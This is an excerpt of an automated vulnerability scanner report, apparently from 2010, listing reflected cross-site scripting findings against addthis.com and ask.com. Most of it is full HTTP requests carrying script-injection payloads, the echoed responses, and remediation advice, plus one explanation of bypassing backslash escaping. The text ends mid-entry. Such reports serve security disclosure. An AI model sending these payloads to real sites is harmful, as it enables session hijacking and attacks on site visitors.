This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d73"-alert(1)-"69586b36faf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2749<script>alert(1)</script>6a4b41f81b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b50<script>alert(1)</script>e93df9b1aef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7de"-alert(1)-"5df2828d99b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5766f"-alert(1)-"ba98fa08a3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78312<script>alert(1)</script>0b016d8c0e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fc54"-alert(1)-"82596acea0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9c29<script>alert(1)</script>f5118c59dad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad</strong> ...[SNIP]...
2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ea55f<script>alert(1)</script>15dfb687cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd0"-alert(1)-"6d181bcf17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 307df<script>alert(1)</script>bd5fc24f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db573<script>alert(1)</script>f9e1a86c09d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81be2"-alert(1)-"71b90c0a1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38562<script>alert(1)</script>40e45f429b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 227f5"-alert(1)-"d6b59968138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25f7b<script>alert(1)</script>51cc3c6a826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beebb"-alert(1)-"e38d13d71e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n8vgn509dukuh80gfrle1a9ug2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ecf5<script>alert(1)</script>225f6a9584 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=uv8f494h43h01fqra5pp1k3sv4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1605
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a576<script>alert(1)</script>28122e63156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=8ubi0bfslihqmjfcvl1u62r5u2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa552"-alert(1)-"7ce969362f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rtbcstsg2h8rgbhq9g2pvhc250; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d83"-alert(1)-"f43f83f718e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:00 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=kai74u0c5hi68smm3pfra1et05; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df1a<script>alert(1)</script>ff4fc4b5c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:09 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=pa4nmf2sogo37cd58aeki3on15; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c</strong> ...[SNIP]...
2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9df66<script>alert(1)</script>548f4c9c066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1 HTTP/1.1 Host: www.addthis.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:11:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=0urtvj47g39mh5kr9tnnta4sa0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1569
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1</strong> ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29fdb'%3balert(1)//4d917efb5f3 was submitted in the l parameter. This input was echoed as 29fdb';alert(1)//4d917efb5f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictures?q=Ohio&o=0&l=29fdb'%3balert(1)//4d917efb5f3&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head>
...[SNIP]...
var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=ADABB184D90011265DC483D042F04B4F&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=29fdb';alert(1)//4d917efb5f3';
The value of the l request parameter is copied into a JavaScript rest-of-line comment. The payload ec4a3%0aalert(1)//34861841eee was submitted in the l parameter. This input was echoed as ec4a3 alert(1)//34861841eee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictures?q=Ohio&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88aec4a3%0aalert(1)//34861841eee&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head>
...[SNIP]...
var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=5FE0A0EC710BBBF7BFB5CE57623B5A62&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3 alert(1)//34861841eee';
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd16d\'%3b4e4b316f914 was submitted in the q parameter. This input was echoed as cd16d\\';4e4b316f914 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
